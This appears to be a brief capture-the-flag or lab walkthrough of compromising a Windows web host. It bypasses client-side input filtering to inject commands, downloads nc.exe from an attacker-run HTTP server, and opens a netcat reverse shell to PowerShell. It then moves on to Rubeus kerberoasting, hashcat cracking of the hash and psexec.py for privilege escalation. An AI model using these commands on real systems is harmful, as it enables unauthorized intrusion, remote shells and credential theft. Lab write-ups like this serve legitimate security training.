- Network enumeration -sC -sT -vv <ip>
Check the website and create new account
click to profile and try to change username with different characters(; ? | “ :) if its available.
You cant able to add with those characters.
Now check the inspect elements, in the network
you can see directory of some script.
When you block this url, the input login now will not sanitize.
As of now we can able to input some payloads or commands.
And now our plan is to put a listener in the system of Victim machine.
To copy/transfer the nc.exe we are going to use python
“python -m http.server”
And we can input this command “powershell curl <ip>:8000/nc.exe -o nc.exe” on the victim website
Let setup a new listener with netcat..
We will run now “nc.exe <ip> <port> -e powershell” to gain reverse shell..
And now we have shell..
Lets prepare Rubeus.exe, tool that we will use to gain priv esc..
now lets crack “# hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt”
Now lets use “psexec.py”